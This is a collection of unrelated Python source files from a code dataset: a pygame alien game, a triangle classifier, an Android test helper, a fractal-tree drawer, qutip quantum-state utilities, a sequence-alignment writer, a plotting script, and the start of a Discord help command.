\n #make them stop half way\n# if self.rect.y > self.maxy: \n# self.vy = 0\n\n\n# if self.aCount % 5 == 0:\n# self.image = pygame.transform.rotate(self.image, self.angle)\n if self.aCount < self.attack:\n self.aCount += 1\n \n super().update()\n \n #true alive\n def hit(self, hitPower):\n self.power -= hitPower\n return self.power > 0 \n \nclass Three(Alien):\n def __init__(self, x, y, maxy):\n super().__init__(x, y, maxy)\n self.image = pygame.image.load(\"./res/a3.png\").convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n \n self.amp = 33\n self.speed= 3 \n self.power = 12\n self.attack = 80\n \nclass Star(Alien):\n def __init__(self, x, y, maxy):\n super().__init__(x, y, maxy)\n self.image = pygame.image.load(\"./res/a4.png\").convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n \n self.amp = 60\n self.speed= 4\n self.power = 20\n self.attack = 20\n \nclass CommandShip(Alien):\n def __init__(self, x, y,maxy, drones=10):\n super().__init__(x, y, maxy)\n self.image = pygame.image.load(\"./res/a2.png\").convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n \n self.amp = 30\n self.speed= 2 \n self.power = 30\n# self.image.fill(pygame.Color(50,100,100))\n self.droneCount = drones\n self.drones = pygame.sprite.Group()\n# self.makeDrones()\n self.attack = 40\n self.aCount = 0\n \n def makeDrones(self):\n n = self.droneCount\n \n for i in range(0, n):\n self.drones.add(Drone(self.getCenter(), n=i, count=self.droneCount))\n \n def update(self):\n# if not self.explode:\n# self.vx = -self.rect.y + self.amp * sin(self.rect.y * pi / 180)\n# self.vy = self.speed\n \n super().update()\n for d in self.drones:\n d.center = self.getCenter()\n \n \n \nclass Drone(Three):\n def __init__(self, center, n, count):\n super().__init__(0, 0, 2000)\n# \n# self.image = pygame.Surface([20, 20])\n# self.image.fill(pygame.Color(234,200,100))\n# \n# self.rect = self.image.get_rect()\n# \n self.center = center\n self.r = 150\n self.speed = 1\n self.angle = n * 360/count\n# self.power = 1\n \n def update(self):\n \n j = self.center[0]\n k = 
self.center[1]\n        self.angle += self.speed\n        a = self.angle\n        r = self.r\n        x = j + r* cos(a* pi /180)\n        y = k + r* sin(a* pi / 180)\n#         t = 'x: ' + str(x) + ' y: ' + str(y)\n#         print(t)\n        self.rect.x = int(x)\n        self.rect.y = int(y)\n        \n        \n#         super().update()\n        \n        \n        \n        \n        \n        \n    ","sub_path":"final version/alien.py","file_name":"alien.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"587821408","text":"# coding=utf-8\na = float(input('a: '))\nb = float(input('b: '))\nc = float(input('c: '))\nm1 = 0\nm2 = 0\nm3 = 0\n\n\nif a + b > c and b + c > a and c + a > b:\n    print ('Triangle exist')\n    if (a >= b) and (a >= c):\n        m1 = a\n        m2 = b\n        m3 = c\n    elif (b >= a) and (b >= c):\n        m1 = b\n        m2 = c\n        m3 = a\n    elif (c >= a) and (c >= b):\n        m1 = c\n        m2 = a\n        m3 = b\n    if m1 ** 2 == (m2 ** 2 + m3 ** 2):\n        print(\"Triangle is right\")  # right triangle: m1**2 == m2**2 + m3**2\n    elif m1 ** 2 < (m2 ** 2 + m3 ** 2):\n        print (\"Triangle is acute\")  # acute triangle: m1**2 < m2**2 + m3**2\n    elif m1 ** 2 > (m2 ** 2 + m3 ** 2):\n        print ('Triangle is obtuse')  # obtuse triangle: m1**2 > m2**2 + m3**2\n\nelse:\n    print ('Triangle does not exist')\n","sub_path":"Informatics/Boolean/triangle_type.py","file_name":"triangle_type.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"570205360","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom uiautomatorplug.android import device as d\r\nimport os\r\nimport time\r\nimport shutil\r\nimport subprocess\r\n\r\n\r\ndef registerSysWatchers():\r\n    d.watchers.reset()\r\n    d.watchers.remove()\r\n    d.watcher(\"IGNORE_ANR\").when(textContains='无响应').click(text='确定')\r\n    d.watcher(\"IGNORE_CRASH\").when(textContains='停止运行').click(text='确定')\r\n    d.watcher(\"IGNORE_POPWINDOW_WEIBO\").when(textContains='给我们评分').click(text='不了,谢谢')\r\n    d.watcher(\"IGNORE_DRAFT\").when(textContains='是否保存草稿').click(text='不保存草稿')\r\n    d.watcher(\"IGNORE_LOCATION\").when(textContains='位置信息').click(text='拒绝')\r\n    d.watcher(\"IGNORE_WLAN\").when(textContains='WLAN').click(text='确定')\r\n    d.watcher(\"IGNORE_NAVIGATION\").when(textContains='离线地图').click(text='暂不需要')\r\n    d.watcher(u\"fc\").when(textContains=u\"很抱歉\").click(text=u\"确定\")\r\n\r\n\r\ndef checkSystemWatchers():\r\n    if d.watcher(\"IGNORE_ANR\").triggered:\r\n        raise Exception('AUTO_FC_WHEN_ANR')\r\n    if d.watcher(\"IGNORE_CRASH\").triggered:\r\n        raise Exception('IGNORE_CRASH')\r\n    if d.watcher(u\"fc\").triggered:\r\n        raise Exception(\"Force close occurs\")\r\n    d.watchers.reset()\r\n    d.watchers.remove()\r\n\r\n\r\nclass util(object):\r\n\r\n    def __init__(self):\r\n        super(util, self).__init__()\r\n\r\n\r\n    def clog(self):\r\n        os.system(\"adb logcat -c\")\r\n\r\n    def log(self):\r\n        cmd = 'adb shell logcat -v time -d '\r\n        # named after the time, e.g. 2016-04-16-05\r\n        line = self.path\r\n        # named after the case name, e.g. OtherTest.test_fail\r\n        os.makedirs(\"testresult\" + os.sep + self.path + os.sep + \"log\" + os.sep + self.folder)\r\n        # record_log=\"testresult/2016-04-16-05/OtherTest.test_fail/2010xxx.log\"\r\n        record_log = \"testresult\" + os.sep + self.path + os.sep + \"log\" + os.sep + self.folder + os.sep + time.strftime(\r\n            \"%Y%m%d%H%M%S\",\r\n            time.localtime(\r\n                time.time())) + \".log\"\r\n        with open(record_log, 'w') as f:\r\n            p = subprocess.Popen(cmd, stdout=f, stderr=subprocess.PIPE, shell=True)\r\n\r\n    def result_path(self):\r\n        # under testresult, mkdir 2016-04-16-05\r\n        # should this be defined globally?\r\n        iso_time_format = 
'%Y-%m-%d-%H-%M'\r\n        self.path = time.strftime(iso_time_format, time.localtime(time.time()))\r\n        if os.path.exists(\"testresult\" + os.sep + self.path):\r\n            shutil.rmtree(\"testresult\" + os.sep + self.path)\r\n            time.sleep(2)\r\n        os.mkdir(\"testresult\" + os.sep + self.path)\r\n        return self.path\r\n\r\n    def recordcase(self, caseName, className):\r\n\r\n        self.folder = getattr(caseName, \"__name__\")\r\n","sub_path":"atPhoenix/buildcheck/CZFileManager/common/util_copy.py","file_name":"util_copy.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"135026558","text":"class Board(object):\n    def __init__(self,board=None):\n        # default to an empty 3x3 grid so Board() can be constructed without arguments\n        self.board = board if board is not None else [[None] * 3 for _ in range(3)]\n    \n    def getBoardState(self):\n        if self.board:\n            return self.board\n        else:\n            return None\n    \n    def updateBoard(self,pos,pieceType):\n        \n        if pieceType == None or pos[0] == None or pos[1] == None or pos == None:\n            return False\n        \n        i = pos[0]\n        j = pos[1]\n        \n        if self.board[i][j] != None:\n            return False\n        else:\n            self.board[i][j] = pieceType\n            return True\n\nclass Player(object):\n    def __init__(self,name,playerType,piece):\n        self.name = name\n        self.playerType = playerType\n        self.piece = piece\n    \n    def checkState(self):\n        board = Board()\n        boardState = board.getBoardState()\n        # pass it to UI, UI displays the board\n        \n    def playMove(self,pos,pieceType):\n        board = Board()\n        return board.updateBoard(pos,pieceType)\n    \nclass Game(object):\n    def __init__(self,board,player_1,player_2, player1_piece, player2_piece,winner):\n        self.board = board\n        self.player_1 = player_1\n        self.player_2 = player_2\n        self.player1_piece = player1_piece\n        self.player2_piece = player2_piece\n        self.winner = winner","sub_path":"SalesForce/TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"256916816","text":"from graphics import *\nfrom math import pi\nfrom math import cos\nfrom math import sin\n\nWIN_WIDTH = 500\nWIN_HEIGHT = 500\n\nTRUNK_X = WIN_WIDTH/2\nTRUNK_Y = WIN_HEIGHT\n\nINIT_LENGTH = 125;\nINIT_THICKNESS= 10;\nMID_BRANCH_LENGTH_MULTIPLIER = 1/4\nLEFT_BRANCH_LENGTH_MULTIPLIER = 1/2\nRIGHT_BRANCH_LENGTH_MULTIPLIER = 2/5\nLENGTH_MULTIPLIER = 2/3\nTHICKNESS_MULTIPLIER = 2/3\n\nINIT_ROT_ADDITION = 0\nINIT_TRUNK_ANGLE = pi/2\nINIT_MID_BRANCH_ANGLE = pi/14\nINIT_LEFT_BRANCH_ANGLE = pi/4\nINIT_RIGHT_BRANCH_ANGLE = pi/6\n\nwin = GraphWin(\"Fractal Tree\", WIN_WIDTH, WIN_HEIGHT)\n\ndef main():\n    quit = False\n    while not quit:\n        n = int(input(\"Input size of tree (0, 1, 2, 3...): \"))\n        draw_tree(TRUNK_X, TRUNK_Y, INIT_LENGTH, INIT_THICKNESS, INIT_ROT_ADDITION, n, 0)\n        if input(\"Continue? 
(y/n) \") != \"y\":\n quit = True\n if not quit:\n clear()\n\ndef draw_tree(x, y, line_length, line_thickness, additional_rot, n, num_rec_calls):\n\n base_x = x + line_length*cos(INIT_TRUNK_ANGLE+ additional_rot)\n base_y = y - line_length*sin(INIT_TRUNK_ANGLE + additional_rot)\n\n point1 = Point(x, y)\n point2 = Point(base_x, base_y)\n line1 = Line(point1, point2)\n line1.setWidth(line_thickness)\n line1.draw(win)\n\n point3 = Point(base_x - line_length * MID_BRANCH_LENGTH_MULTIPLIER * sin(INIT_MID_BRANCH_ANGLE + additional_rot), \n base_y - line_length * MID_BRANCH_LENGTH_MULTIPLIER * cos(INIT_MID_BRANCH_ANGLE + additional_rot))\n line2 = Line(point2, point3)\n line2.setWidth(2*line_thickness/3)\n line2.draw(win)\n\n point4 = Point(base_x - line_length * LEFT_BRANCH_LENGTH_MULTIPLIER * sin(INIT_LEFT_BRANCH_ANGLE + additional_rot), \n base_y - line_length * LEFT_BRANCH_LENGTH_MULTIPLIER * cos(INIT_LEFT_BRANCH_ANGLE+ additional_rot))\n line3 = Line(point2, point4)\n line3.setWidth(2*line_thickness/3)\n line3.draw(win)\n\n point5 = Point(base_x + line_length * RIGHT_BRANCH_LENGTH_MULTIPLIER * sin(INIT_RIGHT_BRANCH_ANGLE - additional_rot), \n base_y - line_length * RIGHT_BRANCH_LENGTH_MULTIPLIER * cos(INIT_RIGHT_BRANCH_ANGLE - additional_rot))\n line4 = Line(point2, point5)\n line4.setWidth(2*line_thickness/3)\n line4.draw(win)\n\n if num_rec_calls == n:\n return\n\n draw_tree(point2.x, point2.y, \n line_length * LENGTH_MULTIPLIER, line_thickness * THICKNESS_MULTIPLIER, \n INIT_MID_BRANCH_ANGLE + additional_rot, \n n, \n num_rec_calls + 1)\n draw_tree(point2.x, point2.y, \n line_length * LENGTH_MULTIPLIER, line_thickness * THICKNESS_MULTIPLIER, \n INIT_LEFT_BRANCH_ANGLE + additional_rot, \n n, \n num_rec_calls + 1)\n draw_tree(point2.x, point2.y, \n line_length * LENGTH_MULTIPLIER, line_thickness * THICKNESS_MULTIPLIER, \n -INIT_RIGHT_BRANCH_ANGLE + additional_rot, \n n, \n num_rec_calls + 1)\n\ndef clear():\n for item in win.items[:]:\n item.undraw()\n\nmain()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"355796763","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 10 04:58:37 2021\n\n@author: robert\n\"\"\"\n\n# we will use the seive of erasthones algorithm\n\nimport numpy as np\n\nN = 1000000\n\nprimes = np.arange(start=2, stop=N+1, step=1)\nfor i in range(0,N-2):\n if primes[i] > N**0.5:\n break\n if primes[i] != 0:\n for j in range(1,N//primes[i]):\n primes[i+j*primes[i]]=0\n\n# print(primes)\n\nnon_zero_filter = np.vectorize(bool)(primes)\nprimes = primes[non_zero_filter]\n\n","sub_path":"Seive of Erasthones.py","file_name":"Seive of Erasthones.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"210299929","text":"import numpy as np\nimport qutip as qtp\n\nfrom numpy import exp, sqrt\nfrom scipy.constants import pi\nfrom scipy.special import factorial, eval_hermite, erf\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\nfrom qutip import Qobj\nfrom qutip.matplotlib_utilities import complex_phase_cmap\nfrom numpy import angle\n\nfrom libys.plot3d import Axes3DForceZOrder as Axes3D\n\n\ndef rotation(N: int, theta: float):\n diags = [exp(-1j * n * theta) for n in range(N)]\n return qtp.qdiags(diags, 0)\n\n\ndef fidelity(rho: qtp.Qobj, ket: qtp.Qobj):\n return rho.matrix_element(ket.dag(), 
ket).real\n\n\n# ⟨x|n⟩\ndef fock_wave_function(x, n):\n    coefficient = (2**n * factorial(n) * sqrt(pi))**-0.5\n    return coefficient * exp(-x**2 / 2) * eval_hermite(n, x)\n\n\n# |x⟩\n# N - number of dimensions in Hilbert space\ndef x_ket(N: int, x: float):\n    n = np.arange(N)\n    array = fock_wave_function(x, n)\n    return qtp.Qobj(array)\n\n\n# ⟨x|ρ|x⟩\ndef x_probability_density(rho: qtp.Qobj, x_array: np.ndarray):\n    N = rho.shape[0]  # number of dimensions in Hilbert space\n    pd = np.empty_like(x_array)  # probability density\n\n    for i in range(len(pd)):\n        x = x_ket(N, x_array[i])\n        pd[i] = rho.matrix_element(x, x).real\n\n    return pd\n\n\n# ∫_lo^hi ⟨0|x⟩⟨x|0⟩ dx\ndef int_0x_x0(lo, hi):\n    return (erf(hi) - erf(lo))/2\n\n\n# ∫_lo^hi ⟨0|x⟩⟨x|1⟩ dx\ndef int_0x_x1(lo, hi):\n    return (exp(-lo**2) - exp(-hi**2)) / sqrt(2*pi)\n\n\n# ∫_lo^hi ⟨1|x⟩⟨x|1⟩ dx\ndef int_1x_x1(lo, hi):\n    return np.where(\n        np.isinf(hi),\n        (erf(hi) - erf(lo))/2 + lo*exp(-lo**2) / sqrt(pi),\n        (erf(hi) - erf(lo))/2 + (lo*exp(-lo**2) - hi*exp(-hi**2)) / sqrt(pi)\n    )\n\n\n# ∫_lo^hi |x⟩⟨x| dx\ndef int_xx(lo: float, hi: float):\n    return qtp.Qobj([\n        [int_0x_x0(lo, hi), int_0x_x1(lo, hi)],\n        [int_0x_x1(lo, hi), int_1x_x1(lo, hi)]\n    ])\n\n\n# ⟨i|_n q |j⟩_n\ndef submatrix(q: qtp.Qobj, n: int, i: int, j: int):\n    N = len(q.dims[0])  # number of qubits\n    # bra ⟨i| and ket |j⟩ on qubit n, identity everywhere else\n    proj_i = tensor_1hot(N, n, qtp.qeye(2), qtp.basis(2, i).dag())\n    proj_j = tensor_1hot(N, n, qtp.qeye(2), qtp.basis(2, j))\n    return proj_i * q * proj_j\n\n\n# calculate operator-sum representation Σ_k E_k ρ E_k†\ndef operator_sum(rho: qtp.Qobj, *E: qtp.Qobj):\n    return sum(E_k * rho * E_k.dag() for E_k in E)\n\n\n# create a one-hot tensor\ndef tensor_1hot(N: int, n: int, most: qtp.Qobj, one: qtp.Qobj):\n    qobjs = N * [most]\n    qobjs[n] = one\n    return qtp.tensor(qobjs)\n\n\n# amplitude-damp n-th qubit\n# rho - density matrix\n# N - number of qubits\n# gamma - decay probability\ndef amplitude_damp(rho: qtp.Qobj, N: int, n: int, gamma: float):\n    e0 = qtp.Qobj([\n        [1, 0],\n        [0, sqrt(1-gamma)]\n    ])\n\n    e1 = qtp.Qobj([\n        [0, sqrt(gamma)],\n        [0, 0]\n    ])\n\n    # both Kraus operators act as the identity on every other qubit,\n    # so that e0_N†e0_N + e1_N†e1_N = I (trace preserving)\n    e0_N = tensor_1hot(N=N, n=n, most=qtp.qeye(2), one=e0)\n    e1_N = tensor_1hot(N=N, n=n, most=qtp.qeye(2), one=e1)\n    return operator_sum(rho, e0_N, e1_N)\n\n\n# create an N-qubit 1D cluster state\ndef cluster_1d(N: int):\n    zero = qtp.fock(2, 0)\n    one = qtp.fock(2, 1)\n    plus = (zero + one) / sqrt(2)\n    psi = qtp.tensor(N * [plus])\n\n    for i in range(N - 1):\n        cz = qtp.csign(N=N, control=i, target=i+1)\n        psi = cz * psi\n\n    return psi\n\n\ndef matrix_histogram_complex(\n    M,\n    xlabels=None,\n    ylabels=None,\n    labelsize=12,\n    title=None,\n    limits=None,\n    phase_limits=None,\n    colorbar=True,\n    fig=None,\n    ax=None,\n    threshold=None,\n    azim=-30,\n    elev=30,\n    force_zorder=True,\n    scale_x=1,\n    scale_y=1,\n    scale_z=1\n):\n    \"\"\"\n    Draw a histogram for the amplitudes of matrix M, using the argument\n    of each element for coloring the bars, with the given x and y labels\n    and title.\n\n    Parameters\n    ----------\n    M : Matrix of Qobj\n        The matrix to visualize\n\n    xlabels : list of strings\n        list of x labels\n\n    ylabels : list of strings\n        list of y labels\n\n    title : string\n        title of the plot (optional)\n\n    limits : list/array with two float numbers\n        The z-axis limits [min, max] (optional)\n\n    phase_limits : list/array with two float numbers\n        The phase-axis (colorbar) limits [min, max] (optional)\n\n    ax : a matplotlib axes instance\n        The axes context in which the plot will be drawn.\n\n    threshold: float (None)\n        Threshold for when bars of smaller height should be transparent. 
If\n not set, all bars are colored according to the color map.\n\n Returns\n -------\n fig, ax : tuple\n A tuple of the matplotlib figure and axes instances used to produce\n the figure.\n\n Raises\n ------\n ValueError\n Input argument is not valid.\n\n \"\"\"\n\n if isinstance(M, Qobj):\n # extract matrix data from Qobj\n M = M.full()\n\n n = np.size(M)\n xpos, ypos = np.meshgrid(range(M.shape[0]), range(M.shape[1]))\n xpos = xpos.T.flatten() - 0.4\n ypos = ypos.T.flatten() - 0.4\n zpos = np.zeros(n)\n dx = dy = 0.8 * np.ones(n)\n Mvec = M.flatten()\n dz = abs(Mvec)\n\n # make small numbers real, to avoid random colors\n idx, = np.where(abs(Mvec) < 0.001)\n Mvec[idx] = abs(Mvec[idx])\n\n if phase_limits: # check that limits is a list type\n phase_min = phase_limits[0]\n phase_max = phase_limits[1]\n else:\n phase_min = -pi\n phase_max = pi\n\n norm = mpl.colors.Normalize(phase_min, phase_max)\n cmap = complex_phase_cmap() # plt.get_cmap('twilight')\n\n colors = cmap(norm(angle(Mvec)))\n if threshold is not None:\n colors[:, 3] = 1 * (dz > threshold)\n\n if ax is None:\n if fig is None:\n fig = plt.figure()\n\n ax = Axes3D(fig, azim=azim, elev=elev)\n\n for x in range(M.shape[0]):\n for y in range(M.shape[1] - 1, -1, -1):\n i = x * M.shape[1] + y\n ax.bar3d(xpos[i], ypos[i], zpos[i], dx[i], dy[i], dz[i], color=colors[i])\n\n if title and fig:\n ax.set_title(title)\n\n # x axis\n ax.axes.w_xaxis.set_major_locator(plt.IndexLocator(1, 0.4))\n if xlabels is None:\n xlabels = list(map(str, range(M.shape[0])))\n ax.set_xticklabels(xlabels, verticalalignment='center', horizontalalignment='right')\n ax.tick_params(axis='x', labelsize=labelsize, labelrotation=13)\n\n # y axis\n ax.axes.w_yaxis.set_major_locator(plt.IndexLocator(1, 0.4))\n if ylabels is None:\n ylabels = list(map(str, range(M.shape[1])))\n ax.set_yticklabels(ylabels, verticalalignment='center', horizontalalignment='left')\n ax.tick_params(axis='y', labelsize=labelsize, labelrotation=-34)\n # ax.set_ylabel('光子数', fontsize=15)\n\n # z axis\n if limits is None:\n limits = [0, 1]\n correction = (limits[1] - limits[0]) / 49\n ax.set_zlim3d([limits[0] + correction, limits[1]])\n # ax.set_zlabel('絶\\n対\\n値', fontsize=15, rotation=0)\n # ax.zaxis.set_rotate_label(False)\n ax.zaxis._axinfo['juggled'] = (1, 2, 0)\n ax.tick_params(axis='z', labelsize=12)\n\n # color axis\n if colorbar:\n cax, kw = mpl.colorbar.make_axes(ax, shrink=.75, pad=.0)\n cb = mpl.colorbar.ColorbarBase(cax, cmap=cmap, norm=norm)\n cb.set_ticks([-pi, -pi / 2, 0, pi / 2, pi])\n cb.set_ticklabels((r'$-\\pi$', r'$-\\pi/2$', r'$0$', r'$\\pi/2$', r'$\\pi$'))\n cb.ax.tick_params(labelsize=12) \n # cb.set_label('偏\\n角', fontsize=15, rotation=0, verticalalignment='center', horizontalalignment='right')\n\n ax.get_proj = lambda: np.dot(Axes3D.get_proj(ax), np.diag([scale_x, scale_y, scale_z, 1]))\n\n return fig, ax\n","sub_path":"libys/qtp.py","file_name":"qtp.py","file_ext":"py","file_size_in_byte":7517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"641886139","text":"\nimport inp_seq\n\nseqs = [\"\", '']\n\n\n# takes a long string and breaks it into lines of 60 chars\ndef break_into_lines(strin):\n out1 = \"\"\n i = 0\n for char in strin:\n if i == 60:\n i = 0\n out1 = out1 + \"\\n\" + char\n else:\n i = i + 1\n out1 = out1 + char\n return out1\n\n\n# if the user wants txt output, this function will be called\ndef plain(data, infile, outfile):\n global seqs\n\n # get the input sequence labels\n seqs = 
inp_seq.main(infile)\n labels = []\n with open(infile, 'r') as fin:\n for line in fin:\n if line[0] == '>':\n labels.append(line[1:-1])\n\n # get the input sequence length\n lens = [len(seqs[0]), len(seqs[1])]\n\n # get the list of symbols the appear between the two input sequences\n compsym = \"\"\n for i in range(0, len(data[0][0])):\n if data[0][0][i] == '-' or data[0][1][i] == '-':\n compsym = compsym + \" \"\n elif data[0][0][i] == data[0][1][i]:\n compsym = compsym + '|'\n elif data[0][0][i] != data[0][1][i]:\n compsym = compsym + '.'\n\n # write this information to outfile\n fout = open(outfile, 'w')\n fout.write(\"Input seqs: \")\n fout.write(labels[0] + \" (len=\" + str(lens[0]-1) + \")\" + \"; \")\n fout.write(labels[1] + \" (len=\" + str(lens[1]-1) + \")\\n\")\n fout.write(\"Alignment length=\" + str(len(data[0][0])) + \"; \")\n fout.write(\"Identity = \" + str(int(data[1])) + \"%\\n\\n\")\n out1 = break_into_lines(data[0][0]).split('\\n')\n out2 = break_into_lines(compsym).split('\\n')\n out3 = break_into_lines(data[0][1]).split('\\n')\n\n # for long output sequences, split it into groups of 60 for readability\n i = 0\n for i in range(0, len(out1)):\n fout.write(out1[i] + \"\\n\")\n fout.write(out2[i] + \"\\n\")\n fout.write(out3[i] + \"\\n\\n\")\n\n\n# if the user wants fasta output, this function will be called\ndef fasta(data, infile, outfile):\n\n # get the labels that will describe each seq in the outfile\n labels = []\n with open(infile, 'r') as fin:\n for line in fin:\n if line[0] == '>':\n labels.append(line)\n fout = open(outfile, 'w')\n\n # break the output into lines for readability\n out1 = break_into_lines(data[0][0])\n out2 = break_into_lines(data[0][1])\n\n # write the outfile\n fout.write(labels[0])\n fout.write(str(out1) + \"\\n\")\n fout.write(\"\\n\" + labels[1])\n fout.write(str(out2) + \"\\n\")\n","sub_path":"write_out.py","file_name":"write_out.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313264898","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport numpy as np\nimport os\nfrom pylab import *\nfrom matplotlib import ticker\nfrom matplotlib.ticker import ScalarFormatter\nsformatter=ScalarFormatter(useOffset=True,useMathText=True)\nsformatter.set_scientific(True)\nsformatter.set_powerlimits((-2,3))\n\n#plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))\n\nfont = {'family' : 'serif',\n 'weight' : 'normal',\n 'size' : 14}\nplt.rc('font', **font)\nplt.rc('text', usetex=False)\nplt.figure(figsize=(6,5))\nfig = plt.figure(1)\nax = fig.add_axes([0.14,0.125,0.82,0.85])\n\n\nnroots=7\nnruns=10\ntags=[\"eta0.3\",\"eta0.4\",\"eta0.5\",\"eta1.0\"]\nrhoB=0.0373777 #[0.143511,0.0942362,0.0525105,0.0373777,0.0255775,0.0159063,0.00497411]\nT=[143.45,149.53,153.4,154.45,155.08,155.44,155.66]\ncolors=['r','g','b','k']\nn=0\nstderrK=[]\nstderrS=[]\n\nfor tag in tags:\n stderrK.append([])\n stderrS.append([])\n Ssigma_avg=[]\n Ksigma2_avg=[]\n for i in range(nroots):\n sumS=0\n sumK=0\n Omega=[]\n pbar=[]\n sigma2p=[]\n Ssigmap=[]\n Ksigma2p=[]\n Skellamp=[]\n Ssigma_avg.append(0)\n Ksigma2_avg.append(0)\n\n file=\"../moments_rhoB/T\"+str(i)+tag+\".dat\";\n mydata = np.loadtxt(file,skiprows=1,unpack=True)\n for run in range(nruns):\n Omega.append(mydata[0][run])\n\n pbar.append(mydata[5][run])\n sigma2p.append(mydata[6][run])\n Ssigmap.append(mydata[7][run])\n Ksigma2p.append(mydata[8][run])\n\n 
Skellamp.append(sigma2p[run]/(pbar[run]*Omega[run]))\n\n Ssigma_avg[i]+=Ssigmap[run]*Skellamp[run]\n Ksigma2_avg[i]+=Ksigma2p[run]\n\n Ssigma_avg[i]*=1/nruns\n Ksigma2_avg[i]*=1/nruns\n\n for run in range(nruns):\n sumS+=(Ssigmap[run]*Skellamp[run]-Ssigma_avg[i])**2\n sumK+=(Ksigma2p[run]-Ksigma2_avg[i])**2\n\n stderrS[n].append((1/nroots)*np.sqrt(sumS))\n stderrK[n].append((1/nroots)*np.sqrt(sumK))\n\n #print(\"Ksigma2 error =\",stderrK,\", Ssigma error =\",stderrS)\n\n plt.errorbar(T,Ssigma_avg,stderrS[n],linestyle='-',linewidth=2,color=colors[n],markersize=8, marker='s', markerfacecolor=None, markeredgecolor=None,label=tag+': $C_3/C_1$')\n plt.errorbar(T,Ksigma2_avg,stderrK[n],linestyle='--',linewidth=2,color=colors[n],markersize=10, marker='^', markerfacecolor=None, markeredgecolor=None,label=tag+': $C_4/C_2$')\n\n n+=1\n\nax.tick_params(axis='both', which='major', labelsize=14)\nax.set_xticks(np.arange(140,160,5), minor=False)\nax.set_xticklabels(np.arange(140,160,5), minor=False, family='serif')\nax.set_xticks(np.arange(140,160,5), minor=True)\nax.xaxis.set_major_formatter(ticker.FormatStrFormatter('%d'))\nax.xaxis.set_major_formatter(sformatter)\nplt.xlim(140,160)\n\nax.set_yticks(np.arange(-1,1.5,0.5), minor=False)\nax.set_yticklabels(np.arange(-1,1.5,0.5), minor=False, family='serif')\nax.set_yticks(np.arange(-1,1.5,0.05), minor=True)\nplt.ylim(0.0,1.05)\nax.yaxis.set_major_formatter(ticker.FormatStrFormatter('%1f'))\nax.yaxis.set_major_formatter(sformatter)\n\nax.legend(loc=(0.1,0.05));\n\nplt.xlabel('T (MeV)',fontsize=18 , weight='normal')\nplt.ylabel('$S\\sigma$, $\\kappa\\sigma^2$', fontsize=24, weight='normal')\nplt.savefig('moments_bw_vsT_fixedrhoB.pdf',format='pdf')\nos.system('xdg-open moments_bw_vsT_fixedrhoB.pdf')\n\n\n\n#plt.show()\nquit()\n","sub_path":"figs/moments_vsT_fixedrhoB.py","file_name":"moments_vsT_fixedrhoB.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19594078","text":"import discord\r\nfrom discord.ext import commands\r\n\r\nimport json\r\n\r\nfrom Chess_Bot import constants\r\n\r\n\r\nclass Help(commands.Cog):\r\n\r\n def __init__(self, client: commands.Bot):\r\n self.client = client\r\n\r\n def get_default_help_embed(self):\r\n embed = discord.Embed(title='Help', color=0x02b022)\r\n\r\n embed.set_footer(\r\n text=\"Usage syntax: <required argument>, [optional argument]\")\r\n embed.set_thumbnail(url=constants.AVATAR_URL)\r\n\r\n return embed\r\n\r\n def make_help_embed(self, *, name, description, usage, examples=None, cooldown=None, aliases=None, subcommands=None):\r\n embed = self.get_default_help_embed()\r\n embed.title += f' for command \"${name}\"'\r\n if aliases is not None:\r\n embed.add_field(name='Aliases', value=', '.join([f'`{i}`' for i in aliases]))\r\n if subcommands is not None:\r\n embed.add_field(name='Subcommands:', value='\\n'.join([f'`{name} {i}`' for i in subcommands]))\r\n embed.add_field(name=\"Usage:\", value=f'`{usage}`', inline=False)\r\n embed.add_field(name=\"Description:\", value=description, inline=False)\r\n if examples is not None:\r\n embed.add_field(name=\"Examples:\", value='\\n'.join([f'`{i}`' for i in examples]), inline=False)\r\n if cooldown is not None:\r\n embed.add_field(name=\"Cooldown:\", value=f'{cooldown} seconds')\r\n return embed\r\n\r\n @commands.command()\r\n @commands.cooldown(1, 2, commands.BucketType.user)\r\n async def help(self, ctx, *, command=None):\r\n '''\r\n {\r\n \"name\": \"help\",\r\n 
